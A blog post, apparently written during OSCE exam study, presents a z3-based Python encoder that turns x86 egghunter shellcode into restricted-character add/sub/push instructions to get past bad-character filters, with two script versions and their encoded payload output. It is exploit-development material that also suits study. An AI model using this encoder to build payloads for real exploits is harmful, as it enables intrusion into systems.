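This tool has very limited use cases, so I am only parking it on the blog for now. Explaining how it works properly would foreseeably take some time; if I cannot find that time later, I will delete this post.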

TL;DR

Using purely arithmetic operations, build the shellcode in a register four bytes at a time, then push it onto the stack four bytes at a time, in reverse order.
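To make the "four bytes at a time, in reverse order" part concrete, here is a minimal sketch of the chunking step alone. The helper name `dwords_in_push_order` is only an illustrative label and not part of the tool; the bytes are the egghunter used in the script on this page, and padding the front with `\x41` is assumed to mirror what that script does.

```python
import struct

# Egghunter bytes as used by the script in this post.
EGGHUNTER = bytes.fromhex(
    "6681caff0f42526a0258cd2e3c055a74"
    "efb8773030748bfaaf75eaaf75e7ffe7"
)

def dwords_in_push_order(shellcode: bytes, pad: bytes = b"\x41") -> list:
    """Split shellcode into 32-bit values, last chunk first (hypothetical helper)."""
    # Pad at the front so the length becomes a multiple of 4.
    shellcode = pad * (-len(shellcode) % 4) + shellcode
    chunks = [shellcode[i:i + 4] for i in range(0, len(shellcode), 4)]
    # `push eax` stores the register little-endian, so read each chunk as '<I'.
    # The last chunk is pushed first because the stack grows toward lower addresses.
    return [struct.unpack("<I", chunk)[0] for chunk in reversed(chunks)]

if __name__ == "__main__":
    for value in dwords_in_push_order(EGGHUNTER):
        print("0x%08x" % value)
```

Each printed value is what eax has to hold right before one `push eax`; the rest of the encoder is about reaching those values with restricted bytes only.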

It encodes the shellcode so that it contains only characters from the table below; additional bad characters can be excluded as well:

File:ASCII-Table-wide.svg - Wikipedia
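As a quick sanity check for that restriction, the sketch below lists the bytes of a buffer that would be rejected. It assumes the allowed range is 0x01 to 0x7f, which is what the solver constraints in the script on this page imply, and reuses that script's bad-character list; `disallowed_bytes` is a made-up helper name.

```python
# Same bad-character list as in the script on this page.
BAD_CHARS = {0x0a, 0x0d, 0x2f, 0x3a, 0x3f, 0x40}

def disallowed_bytes(data: bytes, bad_chars=BAD_CHARS) -> list:
    """Return (offset, byte) pairs that break the character restrictions."""
    return [
        (offset, byte)
        for offset, byte in enumerate(data)
        if not 0x01 <= byte <= 0x7f or byte in bad_chars
    ]

if __name__ == "__main__":
    raw = bytes.fromhex("6681caff")          # first four bytes of the raw egghunter
    encoded = bytes.fromhex(
        "2520202020" "2502020202"            # and eax, 0x20202020 / and eax, 0x02020202
        "2d550e7d32"                         # sub eax, 0x327d0e55
        "50"                                 # push eax
    )
    print(disallowed_bytes(raw))
    print(disallowed_bytes(encoded))
```

The raw bytes fail because of values above 0x7f, while the encoded fragment passes.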

Without further ado, here is the code:

#!/usr/bin/env python

import math

from z3 import *
from pwn import *

def solve(b):
    # find three dwords x, y, z made of allowed bytes with x + y + z == b (mod 2**32)
    s = Solver()
    bad_chars = [ 0x0a, 0x0d, 0x2F, 0x3A, 0x3F, 0x40]
    x, y, z = BitVecs('x y z', 32)
    variables = [x, y, z]

    for var in variables:
        for k in range(0, 32, 8):
            # every byte must lie in 0x01..0x7f and must not be a bad char
            s.add(Extract(k+7, k, var) > BitVecVal(0x00, 8))
            s.add(ULT(Extract(k+7, k, var),BitVecVal(0x80, 8)))
            for c in bad_chars:
                s.add(Extract(k+7, k, var) != BitVecVal(c, 8))

    s.add(x+y+z==b)

    # bail out instead of reading a model that does not exist
    if s.check() != sat:
        raise ValueError("no solution for 0x%08x" % b)
    m = s.model()
    r = []
    for i in m:
        r.append(m[i].as_long())

    return r

shellcode = "\x66\x81\xca\xff\x0f\x42\x52\x6a\x02\x58\xcd\x2e\x3c\x05\x5a\x74\xef\xb8\x77\x30\x30\x74\x8b\xfa\xaf\x75\xea\xaf\x75\xe7\xff\xe7"

# reverse the bytes so that the last dword of the shellcode is pushed first
shellcode = shellcode[::-1]

# pad with "\x41" up to a multiple of 4 bytes
shellcode += "\x41"*(math.ceil(len(shellcode)/4)*4-len(shellcode))

final = b""

for i in range(int(len(shellcode)/4)):
    tmp = shellcode[i*4:i*4+4]
    target = int("0x"+''.join(str(hex(ord(j)))[2:].zfill(2) for j in tmp),16)
    # eax starts from 0, so the three subs must add up to -target (mod 2**32)
    neg = 0xFFFFFFFF - target + 1
    res = solve(neg)
    # 0x20202020 & 0x02020202 == 0, so these two ands clear eax
    print("and eax, 0x20202020")
    final += asm('and eax, 0x20202020')
    print("and eax, 0x02020202")
    final += asm('and eax, 0x02020202')
    for j in res:
        print("sub eax, 0x%08x" % j)
        final += asm('sub eax, 0x%08x' % j)
    final += asm("push eax")
    print("push eax\n")

print(''.join("\\x%02x" % i for i in final))

# root @ kali in ~/osce [1:45:44] 
$ python z3encoder.py
and eax, 0x20202020
and eax, 0x02020202
sub eax, 0x327d0e55
sub eax, 0x7b650219
sub eax, 0x6a1e081d
push eax

and eax, 0x20202020
and eax, 0x02020202
sub eax, 0x1c06306f
sub eax, 0x0203507a
sub eax, 0x320c0968
push eax

and eax, 0x20202020
and eax, 0x02020202
sub eax, 0x76274226
sub eax, 0x7f25453c
sub eax, 0x1028046e
push eax

and eax, 0x20202020
and eax, 0x02020202
sub eax, 0x42072067
sub eax, 0x7f09207f
sub eax, 0x0e78062b
push eax

and eax, 0x20202020
and eax, 0x02020202
sub eax, 0x5a20187e
sub eax, 0x2920643e
sub eax, 0x08657e08
push eax

and eax, 0x20202020
and eax, 0x02020202
sub eax, 0x2d7f3747
sub eax, 0x2b3e6539
sub eax, 0x78750b7e
push eax

and eax, 0x20202020
and eax, 0x02020202
sub eax, 0x1b1a1f79
sub eax, 0x2d2a2769
sub eax, 0x4d69770f
push eax

and eax, 0x20202020
and eax, 0x02020202
sub eax, 0x797a3b7f
sub eax, 0x55733d15
sub eax, 0x31480606
push eax

\x25\x20\x20\x20\x20\x25\x02\x02\x02\x02\x2d\x55\x0e\x7d\x32\x2d\x19\x02\x65\x7b\x2d\x1d\x08\x1e\x6a\x50\x25\x20\x20\x20\x20\x25\x02\x02\x02\x02\x2d\x6f\x30\x06\x1c\x2d\x7a\x50\x03\x02\x2d\x68\x09\x0c\x32\x50\x25\x20\x20\x20\x20\x25\x02\x02\x02\x02\x2d\x26\x42\x27\x76\x2d\x3c\x45\x25\x7f\x2d\x6e\x04\x28\x10\x50\x25\x20\x20\x20\x20\x25\x02\x02\x02\x02\x2d\x67\x20\x07\x42\x2d\x7f\x20\x09\x7f\x2d\x2b\x06\x78\x0e\x50\x25\x20\x20\x20\x20\x25\x02\x02\x02\x02\x2d\x7e\x18\x20\x5a\x2d\x3e\x64\x20\x29\x2d\x08\x7e\x65\x08\x50\x25\x20\x20\x20\x20\x25\x02\x02\x02\x02\x2d\x47\x37\x7f\x2d\x2d\x39\x65\x3e\x2b\x2d\x7e\x0b\x75\x78\x50\x25\x20\x20\x20\x20\x25\x02\x02\x02\x02\x2d\x79\x1f\x1a\x1b\x2d\x69\x27\x2a\x2d\x2d\x0f\x77\x69\x4d\x50\x25\x20\x20\x20\x20\x25\x02\x02\x02\x02\x2d\x7f\x3b\x7a\x79\x2d\x15\x3d\x73\x55\x2d\x06\x06\x48\x31\x50
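The output above can be checked by hand with nothing but 32-bit wraparound arithmetic. The sketch below replays the `sub` operands of the first two blocks, starting from eax = 0 (which the two `and` instructions guarantee), and rebuilds the bytes that end up on the stack. `eax_after_subs` and `rebuild` are names invented for this illustration.

```python
import struct

MASK = 0xFFFFFFFF

def eax_after_subs(subs, eax=0):
    """Value left in eax after `sub eax, imm32` for each operand (32-bit wraparound)."""
    for imm in subs:
        eax = (eax - imm) & MASK
    return eax

def rebuild(blocks):
    """Bytes left on the stack after each block ends with `push eax`."""
    stack = b""
    for subs in blocks:
        # Each push lands below the previous one, i.e. in front of it in memory.
        stack = struct.pack("<I", eax_after_subs(subs)) + stack
    return stack

# Operands copied from the first two blocks of the output above.
BLOCK1 = [0x327d0e55, 0x7b650219, 0x6a1e081d]
BLOCK2 = [0x1c06306f, 0x0203507a, 0x320c0968]

if __name__ == "__main__":
    print("0x%08x" % eax_after_subs(BLOCK1))
    print("0x%08x" % eax_after_subs(BLOCK2))
    print(rebuild([BLOCK1, BLOCK2]).hex())
```

The rebuilt bytes are the last eight bytes of the egghunter, which is what one would expect after two pushes.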

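This was inspired by this article, and the code is adapted from it. For the underlying principle, see this article. For the z3 solver, see this article.

As for why I say the use cases are extremely limited: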

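  1. This method inflates the shellcode to 6.5 times its original length, and the space that has to be reserved is at least 7.5 times the shellcode length. (See the improved version below.)

  2. The shellcode also has to execute from the stack, unless a jmp esp instruction could be executed at the end, which it obviously cannot, since its encoding (\xff\xe4) falls outside the allowed character set.

  3. When execution starts, eip must be lower than esp; in other words, viewed on the stack, eip sits above esp. As execution proceeds downward, each decoded dword is pushed and the top of the stack rises, so eip and esp move toward each other until eip finally reaches the instructions that were pushed onto the stack and the handover is complete, as shown in the figure below: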

    image-20200524022337080
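The 6.5x and 7.5x figures in point 1 follow from the instruction sizes: `and eax, imm32` and `sub eax, imm32` take 5 bytes each and `push eax` takes 1, so every 4-byte chunk costs 2*5 + 3*5 + 1 = 26 bytes, and the decoded copy needs its own room on top of that. A small sketch of that arithmetic, with helper names of my own choosing:

```python
import math

AND_LEN = 5   # `and eax, imm32`: opcode byte + 4 immediate bytes
SUB_LEN = 5   # `sub eax, imm32`: opcode byte + 4 immediate bytes
PUSH_LEN = 1  # `push eax`

def encoded_size(shellcode_len: int) -> int:
    """Size of the encoder output for the first version of the script."""
    chunks = math.ceil(shellcode_len / 4)
    return chunks * (2 * AND_LEN + 3 * SUB_LEN + PUSH_LEN)

def reserved_space(shellcode_len: int) -> int:
    """Encoder output plus room for the decoded shellcode pushed on the stack."""
    padded_len = math.ceil(shellcode_len / 4) * 4
    return encoded_size(shellcode_len) + padded_len

if __name__ == "__main__":
    n = 32  # length of the egghunter used in this post
    print(encoded_size(n), encoded_size(n) / n)
    print(reserved_space(n), reserved_space(n) / n)
```

This is only a lower bound on the space; it assumes eip starts exactly where it needs to and ignores any gap between the encoder and esp.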

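Updated on 20200601
I reworked the code substantially. Operating on eax does not always have to take five instructions, because eax does not need to be zeroed every time; the new target value can often be reached from the value already in eax with fewer than five add/sub operations. This greatly reduces the size of the encoded shellcode, at the cost of a much longer encoding time. Call it a tradeoff.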
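To get a feel for that tradeoff, the sketch below compares the byte cost of the two options for a single 4-byte chunk: reuse whatever is already in eax, or zero it first with two `and` instructions. It is a plain byte count under the assumption that every `and`/`add`/`sub eax, imm32` takes 5 bytes and `push eax` takes 1; it is not the selection rule the script itself applies, and `plan_cost` and `cheaper_plan` are hypothetical names.

```python
INSN_LEN = 5  # `and/add/sub eax, imm32`: opcode byte + 4 immediate bytes
PUSH_LEN = 1  # `push eax`

def plan_cost(ops: int, zero_first: bool) -> int:
    """Bytes emitted for one chunk that needs `ops` add/sub instructions."""
    zeroing = 2 * INSN_LEN if zero_first else 0
    return zeroing + ops * INSN_LEN + PUSH_LEN

def cheaper_plan(ops_reusing_eax: int, ops_from_zero: int) -> str:
    """Pick the smaller encoding; ties go to reusing eax."""
    reuse = plan_cost(ops_reusing_eax, zero_first=False)
    zero = plan_cost(ops_from_zero, zero_first=True)
    return "reuse" if reuse <= zero else "zero-first"

if __name__ == "__main__":
    print(plan_cost(3, zero_first=True))   # the fixed layout of the first version
    print(plan_cost(2, zero_first=False))  # two operations on the leftover value
    print(cheaper_plan(2, 2))
    print(cheaper_plan(4, 1))
```

Zeroing costs as much as two arithmetic operations, so it only pays off when it saves more than two of them.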

Without further ado, here is the code:

from z3 import *
from pwn import *
import math
import sys


# egghunter shellcode
shellcode = ""
shellcode += "\x66\x81\xca\xff\x0f\x42\x52\x6a\x02\x58\xcd"
shellcode += "\x2e\x3c\x05\x5a\x74\xef\xb8\x77\x30\x30\x74"
shellcode += "\x89\xd7\xaf\x75\xea\xaf\x75\xe7\xff\xe7"


# little-endian fill-up
shellcode = shellcode[::-1]

# extend the length to the multiple of 4
shellcode += "\x41"*(math.ceil(len(shellcode)/4)*4-len(shellcode))

# define the bad_chars here
bad_chars = [0x0a, 0x0d, 0x2F, 0x3A, 0x3F, 0x40]
is_zerofied = True

def solve(leftover,target):
    global bad_chars
    global is_zerofied

    # nozeros: solution that starts from the value left in eax
    # zeros:   solution that starts from eax == 0
    nozeros = {}
    zeros = {}
    result = [nozeros,zeros]
    leftovers = [leftover,0]

    for op in range(2):
        # try 1, 2, then 3 add/sub operations and keep the first hit
        for ops in range(1,4):
            s = Solver()
            s.set("timeout",10000)
            var = []
            sign = []

            for i in range(ops):
                var.append(BitVec('var_'+str(i),32))
                sign.append(Int('sign_'+str(i)))

            for i in sign:
                # cannot perform sub
                if 0x2d in bad_chars:
                    s.add(i==1)
                # cannot perform add
                elif 0x05 in bad_chars:
                    s.add(i==-1)
                else:
                    s.add(Or(i==1,i==-1))

            for i in var:
                for k in range(0,32,8):
                    # every byte must lie in 0x01..0x7f and must not be a bad char
                    s.add(Extract(k+7, k, i) > BitVecVal(0x00, 8))
                    s.add(ULT(Extract(k+7, k, i),BitVecVal(0x80, 8)))
                    for c in bad_chars:
                        s.add(Extract(k+7, k, i) != BitVecVal(c, 8))
            func = lambda var,sign:var*Int2BV(sign,32)
            s.add(leftovers[op]+sum(list(map(func,var,sign)))==target)
            if s.check() == sat:
                #print("found!")
                #print(s.model())
                for i in s.model():
                    result[op][i.name()]=s.model()[i].as_long()
                break

    if len(zeros) == 0 and len(nozeros) == 0:
        return {}
    elif len(zeros) == 0:
        is_zerofied = False
        return nozeros
    elif len(nozeros) == 0:
        is_zerofied = True
        return zeros
    else:
        # without zeroing, need more than 2 operations than with zeroing
        # then would rather zerofy first.
        if len(zeros)+2<len(nozeros):
            is_zerofied = True
            return zeros
        else:
            is_zerofied = False
            return nozeros


def zerofy():
    # find two dwords made of allowed bytes whose bitwise AND is 0
    global bad_chars
    s = Solver()
    x,y = BitVecs('x y',32)
    var = [x,y]
    for i in var:
        for k in range(0,32,8):
            s.add(Extract(k+7,k,i) > BitVecVal(0x00,8))
            s.add(ULT(Extract(k+7, k, i),BitVecVal(0x80, 8)))
            for c in bad_chars:
                s.add(Extract(k+7, k, i) != BitVecVal(c, 8))
    s.add((x&y)==0)
    if s.check() == sat:
        r = []
        for i in s.model():
            r.append(s.model()[i].as_long())
        return r
    return [0,0]


final = b""

# need "\x25" to perform `and` operation to zerofy eax
# need either "\x2d" to perform `sub` operation or "\x05" to perform `add` operation
if 0x25 in bad_chars or (0x2d in bad_chars and 0x05 in bad_chars):
    print("cannot be decoded!")
    sys.exit(0)

zero1,zero2 = zerofy()

if zero1==0 and zero2==0:
    print("cannot be decoded!")
    sys.exit(0)

print("and eax, 0x%08x" % zero1)
final += asm("and eax, 0x%08x" % zero1)
print("and eax, 0x%08x\n" % zero2)
final += asm("and eax, 0x%08x" % zero2)


# value that eax holds after the previous push
leftover = 0

for i in range(int(len(shellcode)/4)):
    tmp = shellcode[i*4:i*4+4]
    target = int("0x"+''.join(str(hex(ord(j)))[2:].zfill(2) for j in tmp),16)
    #print("target is 0x%08x,leftover = 0x%08x" % (target,leftover))
    res = solve(leftover,target)
    if not res:
        print("cannot encode!")
        sys.exit(0)
    # res holds one var_N and one sign_N entry per operation
    ops = int(len(res)/2)
    if is_zerofied:
        print("and eax, 0x%08x" % zero1)
        final += asm("and eax, 0x%08x" % zero1)
        print("and eax, 0x%08x" % zero2)
        final += asm("and eax, 0x%08x" % zero2)
    for i in range(ops):
        if res['sign_'+str(i)] == -1:
            print("sub eax, 0x%08x" % res['var_'+str(i)])
            final += asm("sub eax, 0x%08x" % res['var_'+str(i)])
        else:
            print("add eax, 0x%08x" % res['var_'+str(i)])
            final += asm("add eax, 0x%08x" % res['var_'+str(i)])
    print("push eax\n")
    final += asm("push eax")
    leftover = target
print(''.join("\\x%02x" % i for i in final))

# root @ kali in ~/osce [13:49:16] 
$ python z3encoder.py
and eax, 0x40404040
and eax, 0x20202020

and eax, 0x40404040
and eax, 0x20202020
add eax, 0x07676576
sub eax, 0x1f677e01
push eax

add eax, 0x0a08047c
sub eax, 0x421d7642
push eax

add eax, 0x010f2013
add eax, 0x4b08017e
sub eax, 0x24782310
push eax

add eax, 0x5c1e5203
sub eax, 0x03300d44
push eax

sub eax, 0x3c040220
add eax, 0x776f0e5a
add eax, 0x08774013
push eax

sub eax, 0x7a071854
add eax, 0x347a6b1a
push eax

add eax, 0x40024931
sub eax, 0x047d5f24
push eax

add eax, 0x067c785b
sub eax, 0x71043904
push eax

\x25\x40\x40\x40\x40\x25\x20\x20\x20\x20\x25\x40\x40\x40\x40\x25\x20\x20\x20\x20\x05\x76\x65\x67\x07\x2d\x01\x7e\x67\x1f\x50\x05\x7c\x04\x08\x0a\x2d\x42\x76\x1d\x42\x50\x05\x13\x20\x0f\x01\x05\x7e\x01\x08\x4b\x2d\x10\x23\x78\x24\x50\x05\x03\x52\x1e\x5c\x2d\x44\x0d\x30\x03\x50\x2d\x20\x02\x04\x3c\x05\x5a\x0e\x6f\x77\x05\x13\x40\x77\x08\x50\x2d\x54\x18\x07\x7a\x05\x1a\x6b\x7a\x34\x50\x05\x31\x49\x02\x40\x2d\x24\x5f\x7d\x04\x50\x05\x5b\x78\x7c\x06\x2d\x04\x39\x04\x71\x50
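Since every block now depends on the value left in eax by the previous one, the easiest way to convince yourself the listing is right is to replay it. Below is a minimal sketch of a tiny emulator for just these four instructions; it is my own illustration rather than part of the tool, and it assumes each `and`/`add`/`sub eax, imm32` is 5 bytes and `push eax` is 1 byte when tallying the size.

```python
import struct

# Instruction listing copied from the output above.
LISTING = """
and eax, 0x40404040
and eax, 0x20202020
and eax, 0x40404040
and eax, 0x20202020
add eax, 0x07676576
sub eax, 0x1f677e01
push eax
add eax, 0x0a08047c
sub eax, 0x421d7642
push eax
add eax, 0x010f2013
add eax, 0x4b08017e
sub eax, 0x24782310
push eax
add eax, 0x5c1e5203
sub eax, 0x03300d44
push eax
sub eax, 0x3c040220
add eax, 0x776f0e5a
add eax, 0x08774013
push eax
sub eax, 0x7a071854
add eax, 0x347a6b1a
push eax
add eax, 0x40024931
sub eax, 0x047d5f24
push eax
add eax, 0x067c785b
sub eax, 0x71043904
push eax
"""

# Egghunter bytes from the second script.
EGGHUNTER = bytes.fromhex(
    "6681caff0f42526a0258cd2e3c055a74"
    "efb87730307489d7af75eaaf75e7ffe7"
)

def replay(listing: str, eax: int = 0xDEADBEEF):
    """Return (bytes left on the stack, encoded size in bytes)."""
    stack, size = b"", 0
    for line in listing.split("\n"):
        line = line.strip()
        if not line:
            continue
        if line == "push eax":
            # The stack grows downward, so each push lands in front of the last.
            stack = struct.pack("<I", eax) + stack
            size += 1
            continue
        op, imm = line.split(" eax, ")
        imm = int(imm, 16)
        if op == "and":
            eax &= imm
        elif op == "add":
            eax = (eax + imm) & 0xFFFFFFFF
        elif op == "sub":
            eax = (eax - imm) & 0xFFFFFFFF
        else:
            raise ValueError("unexpected instruction: " + line)
        size += 5
    return stack, size

if __name__ == "__main__":
    stack, size = replay(LISTING)
    print(stack == EGGHUNTER, size)
```

The initial eax is deliberately garbage to show that the leading `and` pair really clears it before the arithmetic starts.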

Compare this with the result of the original encoder:

>>> len("\x25\x40\x40\x40\x40\x25\x20\x20\x20\x20\x25\x40\x40\x40\x40\x25\x20\x20\x20\x20\x05\x76\x65\x67\x07\x2d\x01\x7e\x67\x1f\x50\x05\x7c\x04\x08\x0a\x2d\x42\x76\x1d\x42\x50\x05\x13\x20\x0f\x01\x05\x7e\x01\x08\x4b\x2d\x10\x23\x78\x24\x50\x05\x03\x52\x1e\x5c\x2d\x44\x0d\x30\x03\x50\x2d\x20\x02\x04\x3c\x05\x5a\x0e\x6f\x77\x05\x13\x40\x77\x08\x50\x2d\x54\x18\x07\x7a\x05\x1a\x6b\x7a\x34\x50\x05\x31\x49\x02\x40\x2d\x24\x5f\x7d\x04\x50\x05\x5b\x78\x7c\x06\x2d\x04\x39\x04\x71\x50")
118
>>> len("\x25\x20\x20\x20\x20\x25\x02\x02\x02\x02\x2d\x55\x0e\x7d\x32\x2d\x19\x02\x65\x7b\x2d\x1d\x08\x1e\x6a\x50\x25\x20\x20\x20\x20\x25\x02\x02\x02\x02\x2d\x6f\x30\x06\x1c\x2d\x7a\x50\x03\x02\x2d\x68\x09\x0c\x32\x50\x25\x20\x20\x20\x20\x25\x02\x02\x02\x02\x2d\x26\x42\x27\x76\x2d\x3c\x45\x25\x7f\x2d\x6e\x04\x28\x10\x50\x25\x20\x20\x20\x20\x25\x02\x02\x02\x02\x2d\x67\x20\x07\x42\x2d\x7f\x20\x09\x7f\x2d\x2b\x06\x78\x0e\x50\x25\x20\x20\x20\x20\x25\x02\x02\x02\x02\x2d\x7e\x18\x20\x5a\x2d\x3e\x64\x20\x29\x2d\x08\x7e\x65\x08\x50\x25\x20\x20\x20\x20\x25\x02\x02\x02\x02\x2d\x47\x37\x7f\x2d\x2d\x39\x65\x3e\x2b\x2d\x7e\x0b\x75\x78\x50\x25\x20\x20\x20\x20\x25\x02\x02\x02\x02\x2d\x79\x1f\x1a\x1b\x2d\x69\x27\x2a\x2d\x2d\x0f\x77\x69\x4d\x50\x25\x20\x20\x20\x20\x25\x02\x02\x02\x02\x2d\x7f\x3b\x7a\x79\x2d\x15\x3d\x73\x55\x2d\x06\x06\x48\x31\x50")
208

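The length drops from 208 to 118 bytes, a reduction of nearly half. The s.set("timeout",10000) setting (in milliseconds) can be adjusted as needed; generally, the longer the timeout, the shorter the encoded output can get, but the longer the encoding takes.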